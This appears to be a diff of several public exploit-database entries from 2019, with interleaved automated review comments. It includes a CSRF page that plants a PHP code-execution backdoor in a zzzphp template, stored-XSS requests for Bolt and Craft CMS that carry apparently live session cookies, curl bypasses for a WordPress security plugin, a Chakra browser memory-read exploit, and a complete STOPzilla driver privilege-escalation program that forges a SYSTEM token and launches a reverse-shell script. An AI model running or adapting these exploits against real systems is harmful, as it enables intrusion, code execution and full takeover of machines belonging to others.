<form action="http://192.168.1.64/zzzphp/admin015/save.php?act=editfile" method="POST">
<input type="hidden" name="file" value="&#47;zzzphp&#47;template&#47;pc&#47;cn2016&#47;html&#47;search&#46;html" />
<input type="hidden" name="filetext" value="&#123;if&#58;assert&#40;&#36;&#95;POST&#91;x&#93;&#41;&#125;phpinfo&#40;&#41;&#59;&#123;end&#32;if&#125;" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Save the codes above as html file and host it on a web server. Send the link to the administrator of the website and ask him to click the link(request for exchange friend link or any other possible method), if the person has logged on to the admin panel, it will automatically insert malicious codes in to the template file and leads to dynamic code evaluation.
Remarks: This is a follow up exploit of CVE-2019-9041, whose exploit is here: https://www.exploit-db.com/exploits/46454


@ -0,0 +1,30 @@
# Exploit Title: Bolt CMS - 3.6.4 - Cross-Site Scripting
# Date: 2019-03-04
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://bolt.cm/
# Software Link : https://github.com/bolt/bolt
# Software : Bolt CMS - v 3.6.4
# Version : v 3.6.4
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : CVE-2019-9553
# The XSS vulnerability has been discovered in the Bolt CMS web application software due to its vulnerability in the source code in version 3.6.4.
# HTTP POST Request :
POST /bolt/editcontent/pages HTTP/1.1
Host: bolt-up3x24.bolt.dockerfly.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bolt-up3x24.bolt.dockerfly.com/bolt/editcontent/pages
Content-Type: application/x-www-form-urlencoded
Content-Length: 562
DNT: 1
Connection: close
Cookie: bolt_session_5c201ab91521b607e364bc74271e51f1=3d540aa1d0a0fc38dde995dc6ba8a32e; bolt_authtoken_5c201ab91521b607e364bc74271e51f1=240049afe75abc53fbe51e75103ed138261da69b180ff241b7e815027c39f6fb
Upgrade-Insecure-Requests: 1
content_edit%5B_token%5D=u1EA_Zhor_EwrIyqIt-PLLK02DccGgZDDWFQm1325_8&editreferrer=&contenttype=pages&title=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&slug=script-alert-ismailtasdelen-script&image%5Bfile%5D=2019-03%2Fimg-src-x-onerror-prompt-1-.png&files%5B%5D=&teaser=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&body=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2019-03-04+08%3A24%3A47&datedepublish=&ownerid=1&_live-editor-preview=&content_edit%5Bsave%5D=1
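Review bot: The captured request on L870 and L872 includes what look like live session cookies (`bolt_session_…`, `bolt_authtoken_…`) and the `content_edit[_token]` CSRF value from the author's instance; advisories normally replace such values with placeholders like `<SESSION>` before publication, since they are not needed to understand the issue and the host on L860 is a public hostname. The same applies to the Craft CMS section that follows, where the `CraftSessionId`, `CRAFT_CSRF_TOKEN` and identity cookies on L901 and the token on L903 are included verbatim. The description on L857 does not name the affected field; a line such as `# Vulnerable parameter: title` would spare the reader decoding the body.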


@ -0,0 +1,31 @@
# Exploit Title: Craft CMS 3.1.12 Pro - Cross-Site Scripting
# Date: 2019-03-04
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://craftcms.com/
# Software Link : https://github.com/craftcms/cms
# Software : Craft CMS 3.1.12 Pro
# Version : 3.1.12 Pro
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : CVE-2019-9554
# In the 3.1.12 Pro version of the Craft CMS web application, the XSS vulnerability has been discovered
# in the header insertion field when adding source code.
# HTTP POST Request :
POST /XXX/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-test HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/XXX/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-test
Content-Type: application/x-www-form-urlencoded
Content-Length: 1936
DNT: 1
Connection: close
Cookie: CraftSessionId=2ea7nf0jqr0dtl3ioesmlpibfn; CRAFT_CSRF_TOKEN=deccdc1b2ef00dd8580186987fe54e3cdf92305c6150cffb523f392540a2d4aba%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A208%3A%22iuw8Yd67pzxgeP7PrY9zqL5nYEB0Uor6JeS779fM%7Cf42be7b0c353ba14582c1e682a6150947da39c970d31f5cbc3ddc4c0bbe14608iuw8Yd67pzxgeP7PrY9zqL5nYEB0Uor6JeS779fM%7C1%7C%242a%2413%245j8bSRoKQZipjtIg6FXWR.kGRR3UfCL.QeMIt2yTRH1.hCNHLQKtq%22%3B%7D; 1031b8c41dfff97a311a7ac99863bdc5_identity=9804f2668edfba25525881f3badabcfe5adb1d71f4dcb4504daee11a78bc94a3a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_identity%22%3Bi%3A1%3Bs%3A197%3A%22%5B%221%22%2C%22%5B%5C%22dQCnIq3FbN0KsbTg8nbPQxV3JvEWqbBzqXjf0nwbvJDN0LjgArYGZe4WaYfo3AiYzm8CaeKPjT9CUw_8mnAd_D89-nf39hYXRRoq%5C%22%2Cnull%2C%5C%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A65.0%29+Gecko%2F20100101+Firefox%2F65.0%5C%22%5D%22%2C3600%5D%22%3B%7D; 1031b8c41dfff97a311a7ac99863bdc5_username=53dcb198f73d427f239351d0c5ac1bb1e4fbba88fab3cc128854b0232098896da%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D
Upgrade-Insecure-Requests: 1
CRAFT_CSRF_TOKEN=dgLN-H1XWhJgLIiYSYl52Z4wVJZttVH_wDyF9k5Bi00GXCSSTri7oLF9innUOlavPu4AhcUUuEoHMpGSl7-GbdK9oBrDQT5p3BN2frKMuzd6IgTMdbWhgSXqx6pj4hV1UyLi8rZBnAqaMQT1eP_1_4X0fqZYp5Q4GfmlV7iq26NdVxnY_X03CauMkmElBmRoa-6A_U8FGYjg2ipWdesOvZa18UZsUHMNWUWBmYzHJc-82MSRtiZ19DS1iTzV74nlnSaY3vva5oBQFEDtnwZhqR93usAkM2wlEFbw_yzZTonsaW3sHPlkkZl5x8YbLvl7TDl3pXmB3e3NG75Ltl9hzQ6NM7D2dtl7MwepoPSO41vqj8Es8nQOUOgkEh-BtdgOTRJg_0TTlOJHifTOB4EhFmNAgJeHdao6olhxgkCmkcmyhATeP8LED0mL_G7C25eWMw5cms0oWHudxvcyEjFdDiaSsYFrN3is0ekOYx_TbO7E2roXNjkDZy0M5q_Kn3KdkrODw-QVIJJ3-adtsKLAka9fzIyz68joE1oIoc5NFdg%3D&action=entries%2Fsave-entry&redirect=ac40ade69b3fe7bc96c8157907aae4128d2b64f411148be4af2141edea85b42fentries%2Fnews&sectionId=2&entryId=258&title=Craft+CMS+3.1.12+Pro+-+XSS+TEST&fields%5BfeaturedEntry%5D=&fields%5BfeaturedImage%5D=&fields%5BshortDescription%5D=%3Cp%3ECraft+CMS+3.1.12+Pro+-+XSS+TEST%3C%2Fp%3E&fields%5Bheading%5D=Craft+CMS+3.1.12+Pro+-+XSS+TEST&fields%5Bsubheading%5D=Craft+CMS+3.1.12+Pro+-+XSS+TEST&fields%5BarticleBody%5D=&fields%5BarticleBody%5D%5B259%5D%5Btype%5D=text&fields%5BarticleBody%5D%5B259%5D%5Benabled%5D=1&fields%5BarticleBody%5D%5B259%5D%5Bfields%5D%5Btext%5D=%3Cfigure%3E%3Ca+href%3D%22%22%3E%3Cimg+src%3D%22https%3A%2F%2Fdemo.craftcms.com%2F3Rdj0OGqru%2Fs%2Fassets%2Fsite%2F-.png%23asset%3A257%3Aurl%22+alt%3D%22%26quot%3B%3Ealert%28%26quot%3Bismailtasdelen%26quot%3B%29%22+title%3D%22%26quot%3B%3Ealert%28%26quot%3Bismailtasdelen%26quot%3B%29%22+data-image%3D%228ilh6edpse56%22%3E%3C%2Fa%3E%3Cfigcaption%3E%22%26gt%3B%3C%2Ffigcaption%3E%3C%2Ffigure%3E&fields%5BarticleBody%5D%5B259%5D%5Bfields%5D%5Bposition%5D=left&typeId=2&slug=craft-cms-3-1-12-pro-xss-test&author=&author%5B%5D=1&postDate%5Bdate%5D=3%2F4%2F2019&postDate%5Btimezone%5D=UTC&postDate%5Btime%5D=8%3A55+AM&postDate%5Btimezone%5D=UTC&expiryDate%5Bdate%5D=&expiryDate%5Btimezone%5D=UTC&expiryDate%5Btime%5D=&expiryDate%5Btimezone%5D=UTC&enabled=1&revisionNotes=


@ -0,0 +1,65 @@
# Exploit Title: WordPress Cerber Security, Antispam & Malware Scan - Multiple Bypass Vulnerabilities
# Type: WordPress Plugin
# Date: 2019-03-04
# Active installs: 100,000+
# Version: 8.0
# Software Link: https://wordpress.org/plugins/wp-cerber/
# Exploit Author: ed0x21son
# Category: WebApps, WordPress
# Tested on: Linux/WordPress 5.1
[Vulnerabilities]
#1: Stop user enumeration bypass:
U can bypass user enumeration protection if u use Post method instead of Get.
curl http://localhost/ -d author=1
#2: Protect admin scripts bypass:
U can bypass admin scripts protection if u add one or more slashes to the uri.
curl 'http://localhost/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils'
curl 'http://localhost/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar'
#3: Protects wp-login.php, wp-signup.php and wp-register.php from attacks bypass:
U can bypass this protection if u encode any character in the uri.
curl http://localhost/wp-login%2ephp
curl -v http://localhost/wp-signup%2ephp
curl -v http://localhost/wp-register%2ephp
#4: Hide login URL bypass:
U can bypass if u encode any character in the uri, Cerber will return the secret slug in the Location header field.
curl -I http://localhost/wp-%61dmin/
#5: Stop user enumeration via REST API bypass:
U can bypass if u insert /index.php/ between domain and rest route.
curl http:/localhost/index.php/wp-json/wp/v2/users/
#6: Disable REST API bypass:
Same above.
curl http:/localhost/index.php/wp-json/wp/v2/
--ed0x21son


@ -0,0 +1,184 @@
<html>
<script>
/*
# Exploit Title: [getting Read permission through Type Confusion]
# Date: [date]
# Exploit Author: [Fahad Aid Alharbi]
# Vendor Homepage: [https://www.microsoft.com/en-us/]
# Version: [Chakra 1_11_4] (REQUIRED)
# Tested on: [Windows 10]
# CVE : [cve-2019-0539]
*/
/* author @0x4142 => Fahad Aid Alharbi
* cve-2019-0539
* Getting Read &_^
* date 27 Feb , 2019
*/
var convert = new ArrayBuffer(0x100);
var u32 = new Uint32Array(convert);
var f64 = new Float64Array(convert);
var BASE = 0x100000000;
function hex(x) {
return `0x${x.toString(16)}`
}
function bytes_to_u64(bytes) {
return (bytes[0]+bytes[1]*0x100+bytes[2]*0x10000+bytes[3]*0x1000000
+bytes[4]*0x100000000+bytes[5]*0x10000000000);
}
function i2f(x) {
u32[0] = x % BASE;
u32[1] = (x - (x % BASE)) / BASE;
return f64[0];
}
function f2i(x) {
f64[0] = x;
return u32[0] + BASE * u32[1];
}
obj = {}
obj.a = 0x41;
obj.b = 0x42;
obj.c = 0x41;
obj.d = 0x42;
obj.e = 0x40;
obj.f = 0x40;
obj.g = 0x90;
obj.h = 0x90;
obj.i = 0x90;
t = new ArrayBuffer(0x200);
newL = 0x1000;
hax = new ArrayBuffer(0x2000);
read_me = 0;
function hit_to_read(t){
obj.h = hax; // set ta->buffer to hax
obj.i = newL; // update target's length
read_me = new Float64Array(t);
return read_me;
}
function read(r,read_me)
{
read_me[7] = i2f(r); // setup hax->buffer
//hax = new ArrayBuffer(0x1000);
return hex(f2i(read_me[7]))
}
function cout(f){return document.write(f);}
function opt(o, c, value) {
o.c = 1
//o.a = "HELLO"
// o.b = 3;
//o.e = 1
class A extends c {
}
o.a = value // will overwrite rcx , rdx , rax
//o.b = value => chakra!Js::RecyclableObject::HasOnlyWritableDataProperties+0xe:
//o.b = 0x42424242
o.c = 555555
// o.d = 4
}
function pwn() {
for (let i = 0; i < 0x1000; i++) {
let o = {a: 1, b: 2,c:3};
opt(o, (function () {}), {});
}
let o = {a: 2222, b: 2,c:4,d:5};
let cons = function () {};
cons.prototype = o;
/* line 120
auxSlots *p
__Vfptr | type | 0x00000001234 | 0x0
*/
opt(o, cons, obj);
o.f = t
read_me = hit_to_read(t);
cout("[+] vtable pointer is " + hex(f2i(read_me[0])));
vtable = hex(f2i(read_me[0]));
buffer_addr = f2i(read_me[7]);
Chakrabase = hex(vtable - 0x59a3c0)
cout("<br>")
cout("[+] ChakraBase : " + Chakrabase)
cout("<br>buffer_addr: " + read(buffer_addr + 40 , read_me))
ThreadContext = read(Chakrabase - 0xffec5448,read_me)
Ntdll = read(Chakrabase - 0xdd9a0000,read_me)
cout("<br>")
cout("[+] ThreadContext : " + ThreadContext)
cout("<br>")
cout("[+] Ntdl : " + Ntdll)
}
pwn();
/*
s=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
chakra!Js::SimpleDictionaryTypeHandlerBase<unsigned short,Js::PropertyRecord const * __ptr64,0>::GetPropertyFromDescriptor<0>+0x59:
00007ffc`d61f4109 4c8b14c8 mov r10,qword ptr [rax+rcx*8] ds:00010000`41414141=????????????????
*/
/*
s=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
chakra!Js::SimpleDictionaryTypeHandlerBase<unsigned short,Js::PropertyRecord const * __ptr64,0>::GetPropertyFromDescriptor<0>+0x59:
00007ffc`d61f4109 4c8b14c8 mov r10,qword ptr [rax+rcx*8] ds:00010000`41414141=????????????????
*/
</script></html>
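Review bot: The header block leaves `# Date: [date]` as an unfilled template field while the author comment a few lines below states `date 27 Feb , 2019`; the header is the metadata block readers and indexers look at first, so the date belongs there. The crash-context comment after `pwn();` is pasted twice verbatim (both blocks start with `s=0033 ss=002b`), and `bytes_to_u64` is defined but never called anywhere in the script. Dropping the duplicate block and the unused helper would make the listing easier to follow without changing what it does.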


@ -0,0 +1,448 @@
/*
3y3t3m th!s - Ivan Ivanovic Ivanov Иван-дурак
недействительный 31337 Team
clone of https://www.exploit-db.com/exploits/45401
deb yaaaa
win7 narrrr (fails)
ch@ng3 p@yl0@d!!!!!!!!!!!!!
*/
#include <stdio.h>
#include <windows.h>
#include <winternl.h>
#include <sddl.h>
#pragma comment(lib,"winsta.lib")
#pragma comment(lib,"advapi32.lib")
#define SystemHandleInformation 16
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
typedef unsigned __int64 QWORD;
typedef struct _SID_BUILTIN
{
UCHAR Revision;
UCHAR SubAuthorityCount;
SID_IDENTIFIER_AUTHORITY IdentifierAuthority;
ULONG SubAuthority[2];
} SID_BUILTIN, *PSID_BUILTIN;
typedef struct _SID_INTEGRITY
{
UCHAR Revision;
UCHAR SubAuthorityCount;
SID_IDENTIFIER_AUTHORITY IdentifierAuthority;
ULONG SubAuthority[1];
} SID_INTEGRITY, *PSID_INTEGRITY;
typedef NTSYSAPI NTSTATUS (NTAPI *_ZwCreateToken)(
OUT PHANDLE TokenHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN TOKEN_TYPE Type,
IN PLUID AuthenticationId,
IN PLARGE_INTEGER ExpirationTime,
IN PTOKEN_USER User,
IN PTOKEN_GROUPS Groups,
IN PTOKEN_PRIVILEGES Privileges,
IN PTOKEN_OWNER Owner,
IN PTOKEN_PRIMARY_GROUP PrimaryGroup,
IN PTOKEN_DEFAULT_DACL DefaultDacl,
IN PTOKEN_SOURCE Source
);
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
int GetWindowsVersion()
{
int ver = 0;
OSVERSIONINFO osvi;
ZeroMemory(&osvi, sizeof(OSVERSIONINFO));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&osvi);
if (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 1) ver = 1; // Windows 7
if (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 2) ver = 2; // Windows 10
return ver;
}
int AddAccountToAdminGroup(HANDLE hTokenElevated)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
DWORD currentusersize;
char currentuser[100];
char netcommand[15000];
ZeroMemory(&si, sizeof(STARTUPINFO));
ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
si.cb = sizeof(STARTUPINFO);
currentusersize = sizeof(currentuser);
if (!GetUserName(currentuser, &currentusersize))
{
printf("\n[-] Failed to obtain current username: %d\n\n", GetLastError());
return -1;
}
printf("\n[*] Creating new process...");
// The command or binary file to be executed can be changed here
sprintf(netcommand, "powershell.exe .\\rev.ps1");
if (!CreateProcessAsUser(hTokenElevated, NULL, netcommand, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] Failed to execute command (%d) Run exploit again\n\n", GetLastError());
return -1;
}
printf("\n[+] Executed command successfully\n");
return 0;
}
PTOKEN_PRIVILEGES SetPrivileges()
{
PTOKEN_PRIVILEGES privileges;
LUID luid;
int NumOfPrivileges = 5;
int nBufferSize;
nBufferSize = sizeof(TOKEN_PRIVILEGES) + sizeof(LUID_AND_ATTRIBUTES) * NumOfPrivileges;
privileges = (PTOKEN_PRIVILEGES) LocalAlloc(LPTR, nBufferSize);
privileges->PrivilegeCount = NumOfPrivileges;
LookupPrivilegeValue(NULL, SE_TCB_NAME, &luid);
privileges->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[0].Luid = luid;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid);
privileges->Privileges[1].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[1].Luid = luid;
LookupPrivilegeValue(NULL, SE_ASSIGNPRIMARYTOKEN_NAME, &luid);
privileges->Privileges[2].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[2].Luid = luid;
LookupPrivilegeValue(NULL, SE_TAKE_OWNERSHIP_NAME, &luid);
privileges->Privileges[3].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[3].Luid = luid;
LookupPrivilegeValue(NULL, SE_IMPERSONATE_NAME, &luid);
privileges->Privileges[4].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[4].Luid = luid;
return privileges;
}
PSID GetLocalSystemSID()
{
PSID psid = NULL;
SID_IDENTIFIER_AUTHORITY sidAuth = SECURITY_NT_AUTHORITY;
if (AllocateAndInitializeSid(&sidAuth, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &psid) == FALSE)
{
printf("\n[-] AllocateAndInitializeSid failed %d\n", GetLastError());
return NULL;
}
return psid;
}
LPVOID GetInfoFromToken(HANDLE hToken, TOKEN_INFORMATION_CLASS type)
{
DWORD dwLengthNeeded;
LPVOID lpData = NULL;
if (!GetTokenInformation(hToken, type, NULL, 0, &dwLengthNeeded) && GetLastError() != ERROR_INSUFFICIENT_BUFFER)
{
printf("\n[-] Failed to initialize GetTokenInformation %d", GetLastError());
return NULL;
}
lpData = (LPVOID)LocalAlloc(LPTR, dwLengthNeeded);
GetTokenInformation(hToken, type, lpData, dwLengthNeeded, &dwLengthNeeded);
return lpData;
}
QWORD TokenAddressCurrentProcess(HANDLE hProcess, DWORD MyProcessID)
{
_NtQuerySystemInformation NtQuerySystemInformation;
PSYSTEM_HANDLE_INFORMATION pSysHandleInfo;
ULONG i;
PSYSTEM_HANDLE_ENTRY pHandle;
QWORD TokenAddress = 0;
DWORD nSize = 4096;
DWORD nReturn;
BOOL tProcess;
HANDLE hToken;
if ((tProcess = OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) == FALSE)
{
printf("\n[-] OpenProcessToken() failed (%d)\n", GetLastError());
return -1;
}
NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
return -1;
}
do
{
nSize += 4096;
pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) HeapAlloc(GetProcessHeap(), 0, nSize);
} while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH);
printf("\n[i] Current process id %d and token handle value %u", MyProcessID, hToken);
for (i = 0; i < pSysHandleInfo->Count; i++)
{
if (pSysHandleInfo->Handle[i].OwnerPid == MyProcessID && pSysHandleInfo->Handle[i].HandleValue == hToken)
{
TokenAddress = pSysHandleInfo->Handle[i].ObjectPointer;
}
}
HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
return TokenAddress;
}
HANDLE CreateUserToken(HANDLE hToken)
{
_ZwCreateToken ZwCreateToken;
HANDLE hTokenElevated;
NTSTATUS status;
int i;
DWORD dwSize = 0;
TOKEN_USER userToken;
PTOKEN_PRIVILEGES privileges = NULL;
PTOKEN_OWNER ownerToken = NULL;
PTOKEN_GROUPS groups = NULL;
PTOKEN_PRIMARY_GROUP primary_group = NULL;
PTOKEN_DEFAULT_DACL default_dacl = NULL;
PLUID pluidAuth;
LARGE_INTEGER li;
PLARGE_INTEGER pli;
LUID authid = SYSTEM_LUID;
LUID luid;
PSID_AND_ATTRIBUTES pSid;
SID_BUILTIN TkSidLocalAdminGroup = { 1, 2, { 0, 0, 0, 0, 0, 5 }, { 32, DOMAIN_ALIAS_RID_ADMINS } };
SECURITY_QUALITY_OF_SERVICE sqos = { sizeof(sqos), SecurityImpersonation, SECURITY_STATIC_TRACKING, FALSE };
OBJECT_ATTRIBUTES oa = { sizeof(oa), 0, 0, 0, 0, &sqos };
TOKEN_SOURCE SourceToken = { { '!', '!', '!', '!', '!', '!', '!', '!' }, { 0, 0 } };
SID_IDENTIFIER_AUTHORITY nt = SECURITY_NT_AUTHORITY;
PSID lpSidOwner = NULL;
SID_INTEGRITY IntegritySIDSystem = { 1, 1, SECURITY_MANDATORY_LABEL_AUTHORITY, SECURITY_MANDATORY_SYSTEM_RID };
ZwCreateToken = (_ZwCreateToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "ZwCreateToken");
if (ZwCreateToken == NULL)
{
printf("[-] Unable to resolve ZwCreateToken: %d\n\n", GetLastError());
return NULL;
}
groups = (PTOKEN_GROUPS)GetInfoFromToken(hToken, TokenGroups);
primary_group = (PTOKEN_PRIMARY_GROUP)GetInfoFromToken(hToken, TokenPrimaryGroup);
default_dacl = (PTOKEN_DEFAULT_DACL)GetInfoFromToken(hToken, TokenDefaultDacl);
pSid = groups->Groups;
for (i=0; i<groups->GroupCount; i++, pSid++)
{
PISID piSid = (PISID)pSid->Sid;
if (pSid->Attributes & SE_GROUP_INTEGRITY)
{
memcpy(pSid->Sid, &IntegritySIDSystem, sizeof(IntegritySIDSystem));
}
if (piSid->SubAuthority[piSid->SubAuthorityCount - 1] == DOMAIN_ALIAS_RID_USERS)
{
memcpy(piSid, &TkSidLocalAdminGroup, sizeof(TkSidLocalAdminGroup)); // Found RID_USERS membership, overwrite with RID_ADMINS
pSid->Attributes = SE_GROUP_ENABLED;
}
else
{
pSid->Attributes &= ~SE_GROUP_USE_FOR_DENY_ONLY;
pSid->Attributes &= ~SE_GROUP_ENABLED;
}
}
pluidAuth = &authid;
li.LowPart = 0xFFFFFFFF;
li.HighPart = 0xFFFFFFFF;
pli = &li;
AllocateAndInitializeSid(&nt, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &lpSidOwner);
userToken.User.Sid = lpSidOwner;
userToken.User.Attributes = 0;
AllocateLocallyUniqueId(&luid);
SourceToken.SourceIdentifier.LowPart = luid.LowPart;
SourceToken.SourceIdentifier.HighPart = luid.HighPart;
ownerToken = (PTOKEN_OWNER) LocalAlloc(LPTR, sizeof(PSID));
ownerToken->Owner = GetLocalSystemSID();
privileges = SetPrivileges();
status = ZwCreateToken(&hTokenElevated,
TOKEN_ALL_ACCESS,
&oa,
TokenPrimary,
pluidAuth,
pli,
&userToken,
groups,
privileges,
ownerToken,
primary_group,
default_dacl,
&SourceToken);
if (status == STATUS_SUCCESS)
{
printf("\n[+] New token created successfully\n");
return hTokenElevated;
}
else
{
// printf("\n[-] Failed to create new token %08x\n", status);
return NULL;
}
if (lpSidOwner) FreeSid(lpSidOwner);
if (groups) LocalFree(groups);
if (privileges) LocalFree(privileges);
if (primary_group) LocalFree(primary_group);
if (default_dacl) LocalFree(default_dacl);
if (ownerToken) { if(ownerToken->Owner) FreeSid(ownerToken->Owner); LocalFree(ownerToken); }
return NULL;
}
int main(int argc, char *argv[])
{
QWORD TokenAddressTarget;
QWORD SepPrivilegesOffset = 0x40;
QWORD PresentByteOffset;
QWORD EnableByteOffset;
QWORD TokenAddress;
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
HANDLE hTokenCurrent;
HANDLE hTokenElevate;
printf("-------------------------------------------------------------------------------\n");
printf(" STOPzilla AntiMalware (szkg64.sys) Arbitrary Write EoP Exploit \n");
printf(" Tested on 64bit Windows 7 / Windows 10 (1803) \n");
printf("-------------------------------------------------------------------------------\n");
TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId());
printf("\n[i] Address of current process token 0x%p", TokenAddress);
TokenAddressTarget = TokenAddress + SepPrivilegesOffset;
printf("\n[i] Address of _SEP_TOKEN_PRIVILEGES 0x%p will be overwritten\n", TokenAddressTarget);
PresentByteOffset = TokenAddressTarget + 0x0;
printf("[i] Present bits at 0x%p will be overwritten\n", PresentByteOffset);
EnableByteOffset = TokenAddressTarget + 0x8;
printf("[i] Enabled bits at 0x%p will be overwritten", EnableByteOffset);
sprintf(devhandle, "\\\\.\\%s", "msprocess");
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("\n[-] Open %s device failed\n\n", devhandle);
return -1;
}
else
{
printf("\n[+] Open %s device successful", devhandle);
}
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hTokenCurrent))
{
printf("[-] Failed OpenProcessToken() %d\n\n", GetLastError());
return NULL;
}
printf("[+] OpenProcessToken() handle opened successfully");
do
{
printf("\n[*] Overwriting _SEP_TOKEN_PRIVILEGES bits");
DeviceIoControl(hDevice, 0x80002063, NULL, 0, (LPVOID)PresentByteOffset, 0, &dwRetBytes, NULL);
DeviceIoControl(hDevice, 0x80002063, NULL, 0, (LPVOID)EnableByteOffset, 0, &dwRetBytes, NULL);
hTokenElevate = CreateUserToken(hTokenCurrent);
Sleep(500);
} while (hTokenElevate == NULL);
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows 7");
printf("\n[*] Exploit will NOT be run!");
}
if (GetWindowsVersion() == 2)
{
printf("[i] Running Windows 10");
AddAccountToAdminGroup(hTokenElevate);
}
else if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not tested on this OS\n\n");
}
CloseHandle(hDevice);
return 0;
}
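Review bot: In CreateUserToken the cleanup block from `if (lpSidOwner) FreeSid(lpSidOwner);` down to the final `return NULL;` is unreachable, because both arms of the preceding `if (status == STATUS_SUCCESS)` already return; the buffers obtained from GetInfoFromToken, SetPrivileges and GetLocalSystemSID are therefore never released, and main calls this function repeatedly inside its do/while, so each iteration leaks them. Either run the frees before the two returns (keeping hTokenElevated) or delete the dead block so the code does not promise cleanup it never performs. Separately, the failed-OpenProcessToken branch in main ends with `return NULL;` from an `int` function; `return -1;` matches the other early exit a few lines above. The header comment also still calls this a clone of 45401 while the banner printed by main keeps the original title, which is worth reconciling.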

150
exploits/windows/webapps/46487.py Executable file



@ -0,0 +1,69 @@
#!/usr/bin/env python
'''
# Exploit Title: MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal
# Date: 02/11/2019
# Exploit Author: 0v3rride
# Vendor Homepage: https://marcom.com/
# Software Link: http://static.pti.com/downloads/FusionPro/Win32/FusionPro_9.3.36_Setup.exe
# Version: < 10.0 (version tested was 9.3)
# Executable/Service: FPProducerInternetServer.exe v9.03.0036.0000 (FusionPro Internet Request Handler)
# Tested on: Windows
# CVE : 2019-7751
Summary
A directory traversal and local file inclusion vulnerability in the FPProducerInternetServer.exe service/utility in Ricoh MarcomCentral's, formerly PTI Marketing, FusionPro VDP Creator allows a remote attacker to list or enumerate sensitive contents of files. Furthermore, this could allow for privilege escalation by dumping the local machine's SAM and SYSTEM database files, access to common files that contain plaintext credentials, and possibly remote code execution.
Attack Details
Exploiting this vulnerability is extremely simple. This could be done from a browser like Firefox. Simply navigate the affected host (e.g. <http://><host.domain.tld>:<port#>/Windows/System32/drivers/etc/hosts. No slash-dot-dots (/../..) are required, but you can add some if you want. Note that the slashes are forward slashes! By default, the service sets up a listener on port 8080.
Vendor Response
